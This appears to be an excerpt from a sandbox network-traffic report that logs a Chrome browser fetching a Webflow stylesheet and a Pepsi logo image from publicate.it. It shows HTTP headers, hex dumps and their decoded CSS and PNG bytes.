                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 64 20 23 45 32 45 32 45 32 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 66 69 67 75 72 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 7d 0a 66 69 67 63 61 70 74 69 6f 6e 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 75 6c 2c 0a 6f 6c 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 30 70 78 3b 0a 7d 0a 2e 77 2d 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 20 7b 0a 20 20 70 61 64
                                                                                                                                                                                                        Data Ascii: d #E2E2E2; font-size: 18px; line-height: 22px;}figure { margin: 0; margin-bottom: 10px;}figcaption { margin-top: 5px; text-align: center;}ul,ol { margin-top: 0px; margin-bottom: 10px; padding-left: 40px;}.w-list-unstyled { pad
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0a 7d 0a 2e 77 2d 69 6e 70 75 74 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 0a 2e 77 2d 73 65 6c 65 63 74 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 7d 0a 2e 77 2d 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 0a 2e 77 2d 73 65 6c 65 63 74 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 7d 0a 2e 77 2d 69 6e 70 75 74 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 0a 2e 77 2d 73 65 6c 65 63
                                                                                                                                                                                                        Data Ascii: -color: #ffffff; border: 1px solid #cccccc;}.w-input:-moz-placeholder,.w-select:-moz-placeholder { color: #999;}.w-input::-moz-placeholder,.w-select::-moz-placeholder { color: #999; opacity: 1;}.w-input::-webkit-input-placeholder,.w-selec
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 30 70 78 3b 0a 7d 0a 2e 77 2d 72 61 64 69 6f 2d 69 6e 70 75 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 7d 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 7d 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 69 6e 70 75 74 20 7b 0a 20 20 77 69 64 74 68 3a 20 30 2e 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 30 2e 31 70 78 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c
                                                                                                                                                                                                        Data Ascii: t: normal; float: left; margin-left: -20px;}.w-radio-input { margin-top: 3px;}.w-file-upload { display: block; margin-bottom: 10px;}.w-file-upload-input { width: 0.1px; height: 0.1px; opacity: 0; overflow: hidden; position: absol
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 72 3a 20 23 65 61 33 38 34 63 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 3b 0a 7d 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 69 6e 66 6f 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 38 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 32 70 78 3b 0a 7d 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 6c 61 62 65 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 38
                                                                                                                                                                                                        Data Ascii: r: #ea384c; padding: 2px 0;}.w-file-upload-info { display: inline-block; line-height: 38px; padding: 0 12px;}.w-file-upload-label { display: inline-block; font-size: 14px; font-weight: normal; cursor: pointer; margin: 0; padding: 8


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        37192.168.2.549780104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC738OUTGET /css/publicateit.webflow.css HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC760INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:18 GMT
                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: W/"3106c-620aa1d0d2bd8-gzip"
                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0a%2Fc2Zlprd6WLfWEngwci%2BV7niI8AQvJI9JJ2cugjQymLvGaxcUBInf7y%2Bo4KeporQNeucuLma9vYcDNTMzrLFvo1mDRDmu8dqAXAbiDEHxzBxPID51o42xRET8xFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a3bc5f43ff-EWR
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC609INData Raw: 37 63 61 39 0d 0a 3a 72 6f 6f 74 20 7b 0a 20 20 2d 2d 34 2d 62 6c 6f 67 3a 20 23 35 35 35 3b 0a 20 20 2d 2d 32 2d 62 6c 6f 67 3a 20 23 32 36 38 62 63 65 3b 0a 20 20 2d 2d 31 2d 62 6c 6f 67 3a 20 23 31 63 36 37 39 39 3b 0a 20 20 2d 2d 37 2d 62 6c 6f 67 3a 20 23 66 39 66 39 66 39 3b 0a 20 20 2d 2d 36 2d 62 6c 6f 67 3a 20 23 62 66 63 39 64 31 3b 0a 20 20 2d 2d 35 2d 62 6c 6f 67 3a 20 23 65 35 65 61 65 64 3b 0a 20 20 2d 2d 77 68 69 74 65 3a 20 77 68 69 74 65 3b 0a 20 20 2d 2d 33 2d 62 6c 6f 67 3a 20 23 66 64 61 31 31 66 3b 0a 20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 66 65 61 31 31 64 3b 0a 20 20 2d 2d 64 61 72 6b 2d 74 72 61 6e 73 70 61 72 65 6e 74 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 35 29 3b 0a 20 20 2d 2d 62 67 3a 20 23 66 37 66 39 66 62 3b 0a
                                                                                                                                                                                                        Data Ascii: 7ca9:root { --4-blog: #555; --2-blog: #268bce; --1-blog: #1c6799; --7-blog: #f9f9f9; --6-blog: #bfc9d1; --5-blog: #e5eaed; --white: white; --3-blog: #fda11f; --orange: #fea11d; --dark-transparent: rgba(0, 0, 0, .5); --bg: #f7f9fb;
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 62 61 63 6b 67 72 6f 75 6e 64 76 69 64 65 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 76 69 64 65 6f 70 6c 61 79 70 61 75 73 65 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 20 7b 0a 20 20 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 20 32 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 33 62 37 39 63 33 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 7b 0a 20 20 2e 77 2d 6c
                                                                                                                                                                                                        Data Ascii: ; margin-left: auto; margin-right: auto; display: block;}.w-backgroundvideo-backgroundvideoplaypausebutton:focus-visible { outline-offset: 2px; border-radius: 50%; outline: 2px solid #3b79c3;}@media screen and (max-width: 991px) { .w-l
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 32 2d 62 6c 6f 67 29 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 75 6c 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 7d 0a 0a 6c 69 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78
                                                                                                                                                                                                        Data Ascii: a { color: var(--2-blog); cursor: pointer; text-decoration: none;}ul { margin-top: 40px; margin-bottom: 40px; margin-left: 10px; padding-left: 40px; font-size: 18px; line-height: 1.6;}li { margin-top: 15px; margin-bottom: 10px
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 68 6f 76 65 72 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 31 2d 62 6c 6f 67 29 3b 0a 7d 0a 0a 2e 64 69 76 2d 62 6c 6f 63 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 37 2d 62 6c 6f 67 29 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 62 6c 75 65
                                                                                                                                                                                                        Data Ascii: hover { background-color: var(--1-blog);}.div-block { background-color: var(--7-blog); text-align: center; border-radius: 6px; margin-top: 0; margin-bottom: 50px; padding-bottom: 20px; padding-left: 10px; padding-right: 10px;}.blue
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 7d 0a 0a 2e 64 69 76 2d 62 6c 6f 63 6b 2d 35 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 37 66 39 66 62 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 0a 2e 64 69 76 2d 62 6c 6f 63 6b 2d 35 2e 68 69 64 64 65 6e 5f 65 6c 65 6d 65 6e 74 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 69 6d 61 67 65 2d 36 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 37 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a
                                                                                                                                                                                                        Data Ascii: flex-start; margin-top: 0; margin-bottom: 60px; display: flex;}.div-block-5 { background-color: #f7f9fb; margin-top: 100px;}.div-block-5.hidden_element { display: none;}.image-6 { float: left; margin-bottom: -70px; margin-left:
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 20 20 68 65 69 67 68 74 3a 20 36 35 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 39 35 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 30 25 3b 0a 20 20 62 6f 74 74 6f 6d 3a 20 61 75 74 6f 3b 0a 20 20 6c 65 66 74 3a 20 30 25 3b 0a 20 20 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 32 29 72 6f 74 61 74 65 28 2d 39 64 65 67 29 3b 0a 7d 0a 0a 2e 62 6c 75 65 2d 74 6f 70 2e 68 65 72 6f 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 35 30 30 70 78 3b 0a 7d 0a 0a 2e 74 78 74 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 3b 0a 20 20 77 69 64 74 68 3a 20 35 32 25 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f
                                                                                                                                                                                                        Data Ascii: height: 650px; margin-top: -95px; position: absolute; top: 0%; bottom: auto; left: 0%; right: auto; transform: scale(1.2)rotate(-9deg);}.blue-top.hero { height: 500px;}.txt-content { z-index: 10; width: 52%; margin-left: auto
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 6d 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 7d 0a 0a 2e 68 65 61 64 69 6e 67 2d 36 2e 73 6d 61 6c 6c 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 3b 0a 7d 0a 0a 2e 69 6d 61 67 65 2d 31 31 20 7b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 32 30 25 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 34 30 25 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 62 61 63 6b 67 72
                                                                                                                                                                                                        Data Ascii: m: 0; padding-top: 0; font-size: 40px; font-weight: 700; line-height: 1.4;}.heading-6.small { margin-top: 0; margin-bottom: 30px; padding-top: 0;}.image-11 { z-index: 10; width: 120%; max-width: 140%; display: block;}.backgr
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 74 74 6f 6e 2e 66 75 6c 6c 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 62 69 67 6f 72 61 6e 67 65 62 75 74 74 6f 6e 2e 6e 6f 63 61 70 20 7b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 62 69 67 6f 72 61 6e 67 65 62 75 74 74 6f 6e 2e 6d 72 30 2c 20 2e 62 69 67 6f 72 61 6e 67 65 62 75 74 74 6f 6e 2e 74 6f 2d 72 69 67 68 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 3b 0a 7d 0a 0a 2e 64 69 76 2d 62 6c 6f 63 6b 2d 39 20 7b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 30 70 78 3b 0a 7d 0a 0a 2e 64 69 76 2d 62 6c 6f 63 6b
                                                                                                                                                                                                        Data Ascii: tton.full { width: 100%;}.bigorangebutton.nocap { text-transform: none;}.bigorangebutton.mr0, .bigorangebutton.to-right { margin-right: 0;}.div-block-9 { flex-direction: column; align-items: flex-start; margin-top: 80px;}.div-block
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 20 31 35 70 78 3b 0a 20 20 67 72 69 64 2d 72 6f 77 2d 67 61 70 3a 20 31 35 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 38 39 39 31 39 35 3b 0a 20 20 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 20 61 75 74 6f 20 61 75 74 6f 3b 0a 20 20 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 20 31 66 72 20 31 66 72 20 31 66 72 3b 0a 20 20 67 72 69 64 2d 61 75 74 6f 2d 72 6f 77 73 3a 20 31 66 72 3b 0a 20 20 67 72 69 64 2d 61 75 74 6f 2d 63 6f 6c 75 6d 6e 73 3a 20 31 66 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 77 69 64 74 68 3a 20 38 30 25 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 64 69
                                                                                                                                                                                                        Data Ascii: 15px; grid-row-gap: 15px; color: #899195; grid-template-rows: auto auto; grid-template-columns: 1fr 1fr 1fr; grid-auto-rows: 1fr; grid-auto-columns: 1fr; justify-content: center; width: 80%; margin-left: auto; margin-right: auto; di
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC1369INData Raw: 6c 6f 63 6b 2d 31 36 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 37 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 25 3b 0a 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 31 35 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 31 29 3b 0a 7d 0a 0a 2e 68 65 61 64 69 6e 67 2d 38 20 7b 0a
                                                                                                                                                                                                        Data Ascii: lock-16 { float: none; border-radius: 10px; height: 370px; margin-bottom: 15px; margin-right: 0%; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; overflow: hidden; box-shadow: 0 0 15px rgba(0, 0, 0, .1);}.heading-8 {


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        38192.168.2.549781104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC793OUTGET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:18 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 15225
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "3b79-620aa1d1c8d67"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Tvq%2F26VrYiNaNHWYjy0tIaswM2ASBUqP3cU%2FGK7n6peJMnQoYOI9%2FUGOinZq7MLfvsh9chPwSMeZhhhDxREr57ppE%2FOB4j4Bihpay%2FZNseiSPo88nbe5i5H3bf8vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a3b9878c3c-EWR
                                                                                                                                                                                                        2024-08-30 16:16:18 UTC618INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 f6 00 00 00 4c 08 06 00 00 00 5e 43 4a db 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 f6 a0 03 00 04 00 00 00 01 00 00 00 4c 00 00 00 00 84 23 5a ec 00 00 3a ec 49 44 41 54 78 01 ed 5d 09 60 55 d5 b5 dd e7 0e 6f c8 44 02 84 40 08 21 40 90 19 07 70 40 50 e3 0c 2a 20 6a b4 6a 51 81 5a da 6a 5b 6b db ff fb db fe fe b4 fd df af b6 b5 56 db fa ab 22 62 15 2b 29 82 8a 50 1c 83 13 4e c8 3c 87 0c 90 84 21 21 f3 f0 de bb d3 5f fb be 21 ef 85 cc 09 48 f4 1d d8 79 ef dd 7b ee b9 e7 ec 7b d6 d9 fb ec b3 cf be 82 4e 61 b2 2c 4b e0 76 72 80 92 f0 39 11 74 26 e8 0c d0 48
                                                                                                                                                                                                        Data Ascii: PNGIHDRL^CJgAMAa8eXIfMM*iL#Z:IDATx]`UoD@!@p@P* jjQZj[kV"b+)PN<!!_!Hy{{Na,Kvr9t&H
